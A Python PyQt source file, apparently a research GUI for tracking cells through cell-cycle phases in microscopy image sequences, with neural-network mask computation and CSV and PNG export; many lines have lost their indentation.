class Widget(QWidget):
def __init__(self, parent=None):
self.Shooted = False
super(Widget, self).__init__(parent=parent)
self.plot_mask = False
self.secondChannel = False
# Image selection
self.fold = QFileDialog.getOpenFileNames(self, "Select files containing images (tiff or png).",
os.path.join(os.getcwd(),'..','Data'),"*.png *.tiff *.tif")
dir_file = self.fold[0][0][:self.fold[0][0].rfind(os.sep)]
file_name = self.fold[0][0][self.fold[0][0].rfind(os.sep)+1:]
file_name = file_name[:-4]
# Check size of the data and format
if len(self.fold[0])!=0:
if self.fold[0][0].endswith('tiff') or self.fold[0][0].endswith('tif'):
TIFF = True
elif not(self.fold[0][0].endswith('png')):
TIFF = False
raise ValueError("Format not supported.")
else:
TIFF = False
else:
TIFF = False
raise ValueError("Error - no file found.")
# load images in shape (TIME,nx,ny)
if TIFF:
imgs = self.fold[0][0]
print("Warning: only one tiff can be process.")
tmp = np.array(imageio.mimread(imgs,memtest=False))
if tmp.dtype!='uint8':
tmp = bytescale(tmp)
self.im = np.squeeze(np.array(tmp,dtype=np.uint8))
self.im_nn = np.squeeze(np.array(tmp,dtype=type_im))
self.start = 0
self.finish = self.im.shape[0]-1
path_fold = self.fold[0][0]
else:
from skimage import color
pictList = self.fold[0]
path_fold = self.fold[0]
tmp = np.array(imageio.imread(pictList[0]))
if tmp.dtype!='uint8':
tmp = bytescale(tmp)
self.im = np.array(tmp,dtype=np.uint8)
self.im = np.zeros((len(pictList),self.im.shape[0],self.im.shape[1]))
self.im_nn = np.zeros((len(pictList),self.im.shape[1],self.im.shape[2]),dtype=type_im)
for i in range(len(pictList)):
tmp = color.rgb2gray(imageio.imread(pictList[i]))
self.im_nn[i] = np.array(tmp,dtype=type_im)
tmp = bytescale(tmp)
self.im[i] = np.array(tmp,dtype=np.uint8)
self.start = 0
self.finish = len(pictList)-1
self.im_original = self.im.copy()
self.nx = self.im[0].shape[0]
self.ny = self.im[0].shape[1]
self.data = self.im[0]
self.maskLoaded = False
# Set up environnement
self.Shooted = False
pal = QPalette()
pal.setColor(QPalette.Background, Qt.black)
self.setAutoFillBackground(True)
self.setPalette(pal)
self.horizontalLayout = QVBoxLayout(self)
self.w1 = Slider(self.start,self.finish)
self.horizontalLayout.addWidget(self.w1)
self.win = pg.GraphicsWindow(title="Basic plotting examples")
p1 = self.win.addPlot(row=1,col=1,rowspan=2)
self.horizontalLayout.addWidget(self.win)
self.w2 = BottomBut()
self.horizontalLayout.addWidget(self.w2)
self.progress = QProgressBar(self)
self.progress.setGeometry(0, 0, 300, 25)
self.progress.setMaximum(self.finish)
self.horizontalLayout.addWidget(self.progress)
self.speed=60
self.volume=0.5
self.step=20
        def quitProcedure():
            """Terminate the whole application immediately."""
            sys.exit()
"""
Load second channel from tif or png images.
If shape is not eqaul to the original image, and error is raised and the second channel is not loaded.
"""
def newChannelProcedure():
# Image selection
fold_ = QFileDialog.getOpenFileNames(self, "Select files containing other channel (tiff or png).",
os.path.join(os.getcwd(),'..','Data'),"*.png *.tiff *.tif")
# Check size of the data and format
if len(fold_[0])!=0:
if fold_[0][0].endswith('tiff') or fold_[0][0].endswith('tif'):
TIFF = True
elif not(fold_[0][0].endswith('png')):
TIFF = False
raise ValueError("Format not supported.")
else:
TIFF = False
else:
TIFF = False
raise ValueError("Error - no file found.")
if TIFF:
imgs = fold_[0][0]
print("Warning: only one tiff can be process.")
tmp = np.array(imageio.mimread(imgs,memtest=False))
from scipy.misc import bytescale
tmp = bytescale(tmp)
im_channel = np.squeeze(np.array(tmp,dtype=np.uint8))
else:
from skimage import color
pictList = fold_[0]
# path_fold = fold_[0]
tmp = np.array(imageio.imread(pictList[0]))
from scipy.misc import bytescale
tmp = bytescale(tmp)
im_channel = np.array(tmp,dtype=np.uint8)
im_channel = np.zeros((len(pictList),im_channel.shape[0],im_channel.shape[1]))
for i in range(len(pictList)):
tmp = bytescale(tmp)
im_channel[i] = np.array(tmp,dtype=np.uint8)
self.im_channel = im_channel.copy()
if self.im_channel.shape == self.im.shape:
self.secondChannel = True
else:
raise ValueError('Channel not with same shape as original images.')
        def shootingProcedure():
            """Start the shooting procedure on the current ROI.

            Requires masks to be loaded/computed and no shooting procedure to
            be already running.  Tracks the mask whose barycenter is at the
            center of the ROI across all frames (via extractMaskFromPoint),
            then opens a cropped view of the tracked cell.
            Returns 0 on error.
            """
            if self.plot_mask and not(self.Shooted):
                self.prev_shoot = -1
                self.Shooted = True
                # Unique id used to name the csv rows and the output folders.
                self.shootID = uuid.uuid4().hex
                self.frameStart = self.w1.x
                initBB = np.array(self.boundingBox)
                # Center of the ROI bounding box.
                middle = np.array(np.mean(initBB,axis=0),dtype=int)
                # Swap the two coordinates — presumably (x, y) -> (row, col)
                # to match the image axes; TODO confirm against extractMaskFromPoint.
                tmp = middle[0]
                middle[0] = middle[1]
                middle[1] = tmp
                self.progress.show()
                if self.secondChannel:
                    self.im, self.currentBar, self.mask_crop, self.im_focus, self.im_channel_focus, _ = extractMaskFromPoint(self.masks,self.im,self.im_channel,0,middle,self.finish,self.progress, minimalSize=minimalSize)
                else:
                    # No second channel: pass a dummy array in its place.
                    self.im, self.currentBar, self.mask_crop, self.im_focus, _, _ = extractMaskFromPoint(self.masks,self.im,np.zeros(1),0,middle,self.finish,self.progress, minimalSize=minimalSize)
                print('Shooting mode, identify phases.')
                # Add a plot showing the crop around the tracked cell.
                self.p3 = self.win.addPlot(row=2,col=2,rowspan=1)
                self.img_crop = pg.ImageItem(None, border="w")
                self.p3.addItem(self.img_crop)
                self.win.show()
                p1.setAspectLocked(ratioKept)
                p1.autoRange()
                self.img_crop.setImage(np.rot90(self.im_focus[self.w1.x],3))
                self.p3.setAspectLocked(ratioKept)
                self.p3.autoRange()
                self.p3.setAspectLocked()
                self.p3.autoRange()
                updateImage()
            elif not(self.plot_mask):
                print('Error: load or compute mask first.')
                return 0
            elif self.Shooted:
                print('Error: already in shooting procedure.')
                return 0
        def unShoot():
            """Leave shooting mode and restore the original (unannotated) images.

            Returns 0 on error (no masks yet, or not currently shooting).
            """
            if self.plot_mask and self.Shooted:
                self.Shooted = False
                self.frameStart = None
                self.currentBar = None
                self.shootID = None
                # Drop the annotated frames produced by the shooting procedure.
                self.im = self.im_original.copy()
                updateImage()
            elif not(self.plot_mask):
                print('Error: load or compute mask first.')
                return 0
            elif not(self.Shooted):
                print('Error: already in unshooting procedure.')
                return 0
"""
        Writing into csv file.
The columns of the file are as follows:
- Code of the current shooting procedure, unique.
- Time where G1 begin.
- Position of barycenter of mask when G1 begin.
- Time where early S begin.
- Position of barycenter of mask when early S begin.
- Time where mid S begin.
- Position of barycenter of mask when mid S begin.
- Time where late S begin.
- Position of barycenter of mask when late S begin.
- Time where G2 begin.
- Position of barycenter of mask when G2 begin.
- Time where tracking end.
- Position of barycenter of mask when tracking ended.
"""
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name)):
os.makedirs(os.path.join(dir_file,'Outputs',file_name))
        def G1():
            """Record the start of the G1 phase for the tracked cell.

            Appends a row to Outputs/<file>/cells.csv holding the shoot id,
            the current frame index and the mask barycenter; the columns of
            the later phases are left blank.  Only active in shooting mode.
            """
            # Highlight the button so the user sees which phase is active.
            self.w2.butG1.setStyleSheet("background-color: red")
            # Create the csv on first use, append afterwards.
            if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'cells.csv')):
                f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"w+")
            else:
                f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"a+")
            if self.Shooted:
                # Columns: shootID, G1 frame, G1 barycenter, then blanks.
                f.write(str(self.shootID)+","+str(self.w1.x)+","+str(self.currentBar[self.w1.x])+", , , , , , , , , ,\n")
                self.prev_shoot = self.w1.x
            else:
                print('Not in shooting mode.')
            f.close()
        def earlyS():
            """Record the start of the early-S phase and save the crops since G1.

            Appends a row to cells.csv (early-S columns filled) and writes,
            for every frame since the previous phase mark, the masked crop
            (zoom/), the mask itself (zoom_mask/) and, if present, the second
            channel crop.  Only active in shooting mode.
            """
            self.w2.butG1.setStyleSheet("background-color: white")
            self.w2.butEarlyS.setStyleSheet("background-color: red")
            # Create the csv on first use, append afterwards.
            if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'cells.csv')):
                f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"w+")
            else:
                f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"a+")
            if self.Shooted:
                if self.prev_shoot==-1:
                    self.prev_shoot = self.w1.x
                f.write(str(self.shootID)+", , ,"+str(self.w1.x)+","+str(self.currentBar[self.w1.x])+", , , , , , , ,\n")
                # Save masks in same folder than images
                if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID))):
                    os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID)))
                if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID))):
                    os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID)))
                # NOTE(review): this loop starts at prev_shoot (inclusive)
                # while the later phase handlers start at prev_shoot+1 —
                # confirm whether the boundary frame should be saved twice.
                for k in range(self.prev_shoot,self.w1.x+1):
                    # Image crop masked by the tracked cell.
                    tmp = np.array(self.im_focus[k]*self.mask_crop[k],dtype=np.float32)
                    if normalize:
                        tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
                    imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
                    # Binary mask crop.
                    tmp = np.array(self.mask_crop[k],dtype=np.float32)
                    tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
                    imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
                    if self.secondChannel:
                        # Second-channel crop (not masked).
                        tmp = np.array(self.im_channel_focus[k],dtype=np.float32)
                        if normalize:
                            tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
                        imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),'channel2_'+str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
                self.prev_shoot = self.w1.x
            else:
                print('Not in shooting mode.')
            f.close()
        def midS():
            """Record the start of the mid-S phase and save the crops since early S.

            Appends a row to cells.csv (mid-S columns filled) and writes the
            masked crops, mask crops and optional second-channel crops for the
            frames since the previous phase mark.  Only active in shooting mode.
            """
            self.w2.butEarlyS.setStyleSheet("background-color: white")
            self.w2.butMidS.setStyleSheet("background-color: red")
            # Create the csv on first use, append afterwards.
            if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'cells.csv')):
                f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"w+")
            else:
                f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"a+")
            if self.Shooted:
                if self.prev_shoot==-1:
                    self.prev_shoot = self.w1.x
                f.write(str(self.shootID)+", , , , ,"+str(self.w1.x)+","+str(self.currentBar[self.w1.x])+", , , , , ,\n")
                # Save masks in same folder than images
                if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID))):
                    os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID)))
                if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID))):
                    os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID)))
                for k in range(self.prev_shoot+1,self.w1.x+1):
                    # Image crop masked by the tracked cell.
                    tmp = np.array(self.im_focus[k]*self.mask_crop[k],dtype=np.float32)
                    if normalize:
                        tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
                    imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
                    # Binary mask crop.
                    tmp = np.array(self.mask_crop[k],dtype=np.float32)
                    tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
                    imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
                    if self.secondChannel:
                        # Second-channel crop (not masked).
                        tmp = np.array(self.im_channel_focus[k],dtype=np.float32)
                        if normalize:
                            tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
                        imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),'channel2_'+str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
                self.prev_shoot = self.w1.x
            else:
                print('Not in shooting mode.')
            f.close()
        def lateS():
            """Record the start of the late-S phase and save the crops since mid S.

            Appends a row to cells.csv (late-S columns filled) and writes the
            masked crops, mask crops and optional second-channel crops for the
            frames since the previous phase mark.  Only active in shooting mode.
            """
            self.w2.butMidS.setStyleSheet("background-color: white")
            self.w2.butLateS.setStyleSheet("background-color: red")
            # Create the csv on first use, append afterwards.
            if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'cells.csv')):
                f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"w+")
            else:
                f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"a+")
            if self.Shooted:
                if self.prev_shoot==-1:
                    self.prev_shoot = self.w1.x
                f.write(str(self.shootID)+", , , , , , ,"+str(self.w1.x)+","+str(self.currentBar[self.w1.x])+", , , ,\n")
                # Save masks in same folder than images
                if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID))):
                    os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID)))
                if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID))):
                    os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID)))
                for k in range(self.prev_shoot+1,self.w1.x+1):
                    # Image crop masked by the tracked cell.
                    tmp = np.array(self.im_focus[k]*self.mask_crop[k],dtype=np.float32)
                    if normalize:
                        tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
                    imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
                    # Binary mask crop.
                    tmp = np.array(self.mask_crop[k],dtype=np.float32)
                    tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
                    imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
                    if self.secondChannel:
                        # Second-channel crop (not masked).
                        tmp = np.array(self.im_channel_focus[k],dtype=np.float32)
                        if normalize:
                            tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
                        imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),'channel2_'+str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
                self.prev_shoot = self.w1.x
            else:
                print('Not in shooting mode.')
            f.close()
        def G2():
            """Record the start of the G2 phase and save the crops since late S.

            Appends a row to cells.csv (G2 columns filled) and writes the
            masked crops, mask crops and optional second-channel crops for the
            frames since the previous phase mark.  Only active in shooting mode.
            """
            self.w2.butLateS.setStyleSheet("background-color: white")
            self.w2.butG2.setStyleSheet("background-color: red")
            # Create the csv on first use, append afterwards.
            if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'cells.csv')):
                f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"w+")
            else:
                f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"a+")
            if self.Shooted:
                if self.prev_shoot==-1:
                    self.prev_shoot = self.w1.x
                f.write(str(self.shootID)+", , , , , , , , ,"+str(self.w1.x)+","+str(self.currentBar[self.w1.x])+", ,\n")
                # Save masks in same folder than images
                if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID))):
                    os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID)))
                if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID))):
                    os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID)))
                for k in range(self.prev_shoot+1,self.w1.x+1):
                    # Image crop masked by the tracked cell.
                    tmp = np.array(self.im_focus[k]*self.mask_crop[k],dtype=np.float32)
                    if normalize:
                        tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
                    imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
                    # Binary mask crop.
                    tmp = np.array(self.mask_crop[k],dtype=np.float32)
                    tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
                    imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
                    if self.secondChannel:
                        # Second-channel crop (not masked).
                        tmp = np.array(self.im_channel_focus[k],dtype=np.float32)
                        if normalize:
                            tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
                        imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),'channel2_'+str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
                self.prev_shoot = self.w1.x
            else:
                print('Not in shooting mode.')
            f.close()
def end():
self.w2.butG2.setStyleSheet("background-color: white")
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'cells.csv')):
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"w+")
else:
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"a+")
if self.Shooted:
if self.prev_shoot==-1:
self.prev_shoot = self.w1.x
f.write(str(self.shootID)+", , , , , , , , , , ,"+str(self.w1.x)+","+str(self.currentBar[self.w1.x])+"\n")
# Save masks in same folder than images
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID))):
os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID)))
for k in range(self.prev_shoot+1,self.w1.x+1):
tmp = np.array(self.im_focus[k]*self.mask_crop[k],dtype=np.float32)
if normalize:
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
tmp = np.array(self.mask_crop[k],dtype=np.float32)
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
if self.secondChannel:
tmp = np.array(self.im_channel_focus[k],dtype=np.float32)
if normalize:
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),'channel2_'+str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
self.prev_shoot = self.w1.x
else:
print('Not in shooting mode.')
f.close()
# def Speed():
# self.speed = self.getInt('Maximum speed in one time step (in pixels)')
# def Volume():
# tmp = self.getInt('Maximum volume increase (in %)')
# self.volume = float(tmp)/100.
# def Step():
# self.step = self.getInt('Time between two detection of cells.')
"""
Load masks from tiff or png file. User should select a tiff image containing a time sequence of mask, or several png files refered as masks.
"""
def loadMasks():
loadsuccesfull = False
self.masks_path = QFileDialog.getOpenFileNames(self, "Select file(s) where masks are.",os.path.join(os.getcwd(),'..','Data'),
"*.png *.tiff *.tif")
if len(self.masks_path[0])!=0:
if self.masks_path[0][0].endswith('tiff') or self.masks_path[0][0].endswith('tif'):
TIFF_masks = True
elif not(self.masks_path[0][0].endswith('png')):
TIFF_masks = False
else:
TIFF_masks = False
loadsuccesfull = True
else:
TIFF_masks = False
print("Error - no file found.")
return False
# load images
if TIFF_masks:
masks_path = self.masks_path[0][0]
print("Warning: only one tiff can be process.")
mask = np.squeeze(np.array(imageio.mimread(masks_path,memtest=False),dtype=np.uint8))
else:
pictList = self.masks_path[0]
tmp = imageio.imread(pictList[0])
mask = np.array(bytescale(tmp),dtype=np.uint8)
mask = np.zeros((len(pictList),mask.shape[0],mask.shape[1]))
for i in range(len(pictList)):
tmp = imageio.imread(pictList[i])
mask[i] = np.array(bytescale(tmp),dtype=np.uint8)
self.masks_original = mask.copy()
self.masks = np.array(self.masks_original > 0,dtype=np.uint8)
if mask.shape[0] != self.finish+1:
print('Not same number of masks than images.')
loadsuccesfull = False
if loadsuccesfull:
if self.plot_mask != True:
self.plot_mask = True
self.p2 = self.win.addPlot(row=1,col=2,rowspan=1)
self.img_m = pg.ImageItem(None, border="w")
self.p2.addItem(self.img_m)
self.maskLoaded = True
self.win.show()
self.w1_m = Slider_thresh(0,1)
self.horizontalLayout.addWidget(self.w1_m)
p1.setAspectLocked(ratioKept)
p1.autoRange()
self.img_m.setImage(np.rot90(self.masks[self.w1.x],3))
self.p2.setAspectLocked(ratioKept)
self.p2.autoRange()
self.p2.setAspectLocked()
self.p2.autoRange()
self.w1_m.valueChangedX.connect(updateThresh)
updateThresh()
else:
self.img_m.setImage(np.rot90(self.masks[self.w1.x],3))
self.p2.setAspectLocked(ratioKept)
self.p2.autoRange()
self.p2.setAspectLocked()
self.p2.autoRange()
"""
Compute masks based on neural network model.
User should select 'h5' or 'hdf5' file.
Custom loss is implemented (binary cross entropy + dice coefficient). If any other custom loss
        should be used, modify it in the following function.
Images are put in [0,1] and then convert to the format needed by the neural network (usually uint16).
Masks are saved into 'Outputs' into the folder containing image
"""
        def computeMasks():
            """Segment every frame with a user-selected Keras model.

            Asks for an h5/hdf5 model, runs it on the images in temporal
            batches of TIME frames (resized to the network input size),
            resizes the predicted masks back to the original frame size,
            saves them as png under Outputs/<file>/masks and displays them
            together with a threshold slider.
            Returns False if no model file is selected.
            """
            from keras.models import load_model
            from tensorflow.python.client import device_lib
            from skimage.transform import resize
            from keras import backend as K
            from keras.losses import binary_crossentropy
            import tensorflow as tf
            import keras
            # Report whether TensorFlow sees a GPU (informational only).
            MODE = "GPU" if "GPU" in [k.device_type for k in device_lib.list_local_devices()] else "CPU"
            print(MODE)
            print('########### Computing masks - please wait... ###########')
            # def dice_coef_K(y_true, y_pred, smooth=1):
            #     y_true_f = K.flatten(y_true)
            #     y_pred_f = K.flatten(y_pred)
            #     intersection = K.sum(y_true_f * y_pred_f)
            #     return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)
            # def dice_coef_loss_K(y_true, y_pred):
            #     return 1-dice_coef_K(y_true, y_pred)
            self.model = QFileDialog.getOpenFileName(self, "Select h5 file defining the AI model.",os.path.join(os.getcwd(),'Data','Segmentation','Model'),
                        "*.h5 *.hdf5")
            if len(self.model[0])==0:
                print("erro - no h5 file found.")
                return False
            # Custom IoU metric (needed to deserialize the trained model).
            def mean_iou(y_true, y_pred):
                prec = []
                for t in np.arange(0.5, 1.0, 0.05):
                    y_pred_ = tf.to_int32(y_pred > t)
                    score, up_opt = tf.metrics.mean_iou(y_true, y_pred_, 2)
                    K.get_session().run(tf.local_variables_initializer())
                    with tf.control_dependencies([up_opt]):
                        score = tf.identity(score)
                    prec.append(score)
                return K.mean(K.stack(prec), axis=0)
            # Custom loss function (binary cross entropy combined with dice).
            def dice_coef(y_true, y_pred):
                smooth = 1.
                y_true_f = K.flatten(y_true)
                y_pred_f = K.flatten(y_pred)
                intersection = K.sum(y_true_f * y_pred_f)
                return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)
            def bce_dice_loss(y_true, y_pred):
                return 0.5 * keras.losses.binary_crossentropy(y_true, y_pred) - dice_coef(y_true, y_pred)
            # Load model and parameters
            # l1 = 1.
            # l2 = -1.
            # loss1 = binary_crossentropy
            # loss2 = dice_coef_loss_K
            # def custom_loss(y_true,y_pred):
            #     return l1*loss1(y_true,y_pred)+l2*loss2(y_true,y_pred)
            # # net = load_model(self.model[0],custom_objects={'custom_loss':custom_loss}) #v0
            net = load_model(self.model[0],custom_objects={'bce_dice_loss': bce_dice_loss, 'mean_iou': mean_iou}) #v1
            # NOTE(review): the next three assignments are immediately
            # overwritten by the if/else below — kept as-is.
            nx = int(net.input.get_shape()[1])
            ny = int(net.input.get_shape()[2])
            TIME = int(net.input.get_shape()[3])
            # LSTM models take input shaped (batch, time, x, y, 1); the others
            # take (batch, x, y, time, 1) — presumably set by the global LSTM
            # flag; TODO confirm against the model definition.
            if LSTM:
                nx = int(net.input.get_shape()[2])
                ny = int(net.input.get_shape()[3])
                TIME = int(net.input.get_shape()[1])
            else:
                nx = int(net.input.get_shape()[1])
                ny = int(net.input.get_shape()[2])
                TIME = int(net.input.get_shape()[3])
            if TIME>self.im.shape[0]:
                raise ValueError('Require at least {0} images, {1} given. This is important since the segmentation used teporal information.'.format(TIME,self.im.shape[0]))
            # Make data in time batch
            nb_serie = int(self.finish+1)//TIME
            im_batch = np.zeros((nb_serie, nx, ny, TIME), dtype=np.float32)
            # NOTE(review): this 'masks' array is redefined with a different
            # shape below before first use — kept as-is.
            masks = np.zeros((nx, ny, self.finish+1), dtype=np.float32)
            for i in range(nb_serie):
                tmp = np.array(self.im_nn[i*TIME:(i+1)*TIME].copy(),dtype=np.float32)
                for t in range(TIME):
                    # Resize each frame to the network input size.
                    im_batch[i,:,:,t] = resize(tmp[t], (nx,ny), mode='constant', preserve_range=True)
                # im_batch[i] = np.array(np.iinfo(type_im).max*(np.array(im_batch[i],dtype=np.float64)-np.min(im_batch[i]))/(np.max(im_batch[i])-np.min(im_batch[i])),dtype=type_im)
            # if nb_serie >0:
            #     im_batch = np.iinfo(type_im).max*(im_batch- np.min(im_batch))/(np.max(im_batch)-np.min(im_batch))
            im_batch = np.expand_dims(np.array(im_batch, dtype=np.float32),4)
            if LSTM:
                # Move the time axis to position 1 for LSTM-style inputs.
                im_batch = np.rollaxis(im_batch,3,1)
            # Compute mask for the first time batchs
            masks = np.zeros((self.finish+1,self.im.shape[1],self.im.shape[2]))
            for i in range(nb_serie):
                print("Neural network progress : {0}%.".format(int(100*i/nb_serie)))
                # Normalise to [0, 1] using the full range of the input dtype.
                tmp = np.array(np.expand_dims(im_batch[i],0),dtype=np.float32)/np.iinfo(type_im).max
                masks_ = np.array(np.squeeze(net.predict(tmp)),dtype=np.float32)
                # masks_ = np.squeeze(tmp)
                if LSTM:
                    # TODO: check this part
                    for t in range(TIME):
                        masks[i*TIME+t] = resize(masks_[t],(self.im.shape[1],self.im.shape[2]), mode='constant', preserve_range=True)
                else:
                    for t in range(TIME):
                        # masks[i*TIME+t] = np.squeeze(self.im[TIME*i+t])
                        masks[i*TIME+t] = resize(masks_[:,:,t],(self.im.shape[1],self.im.shape[2]), mode='constant', preserve_range=True)
            # Compute mask for the remaining images
            if self.finish != TIME*nb_serie:
                # Run the network on the last TIME frames and keep only the
                # predictions for the frames not covered by the batches above.
                tmp = np.array(self.im_nn[self.finish+1-TIME:].copy(),dtype=np.float32)
                im_tmp = np.zeros((1,nx,ny,TIME,1))
                for t in range(TIME):
                    im_tmp[0,:,:,t,0] = resize(tmp[t], (nx,ny), mode='constant', preserve_range=True)
                # im_tmp[0] = np.array(np.iinfo(type_im).max*(np.array(im_tmp[0],dtype=np.float64)-np.min(im_tmp[0]))/(np.max(im_tmp[0])-np.min(im_tmp[0])),dtype=type_im)
                im_tmp = np.array(im_tmp,dtype=np.float32)/np.iinfo(type_im).max
                tmp = np.array(np.squeeze(net.predict(im_tmp)),dtype=np.float32)
                for t in range((self.finish+1-nb_serie*TIME)):
                    masks[nb_serie*TIME+t] = resize(tmp[:,:,TIME-(self.finish-nb_serie*TIME)-1+t],(self.im.shape[1],self.im.shape[2]), mode='constant', preserve_range=True)
            # Save masks in same folder than images
            if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'masks')):
                os.makedirs(os.path.join(dir_file,'Outputs',file_name,'masks'))
            for i in range(self.finish+1):
                # Binarise with a tiny threshold before saving.
                tmp = np.array(np.iinfo(type_save).max*(masks[i]>1e-7),dtype=type_save)
                imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'masks',str(i).zfill(10)+'.png'),tmp)
            print('Masks computed.')
            self.masks_original = masks.copy()
            self.masks = (self.masks_original > 0).astype(np.uint8)
            if self.plot_mask != True:
                # First computation: create the mask view and threshold slider.
                self.plot_mask = True
                self.p2 = self.win.addPlot(colspan=2)
                self.img_m = pg.ImageItem(None, border="w")
                self.p2.addItem(self.img_m)
                self.maskLoaded = True
                self.win.show()
                self.w1_m = Slider_thresh(0,1)
                self.horizontalLayout.addWidget(self.w1_m)
                p1.setAspectLocked(ratioKept)
                p1.autoRange()
                self.p2.setAspectLocked(ratioKept)
                self.p2.autoRange()
                self.img_m.setImage(np.rot90(self.masks[self.w1.x],3))
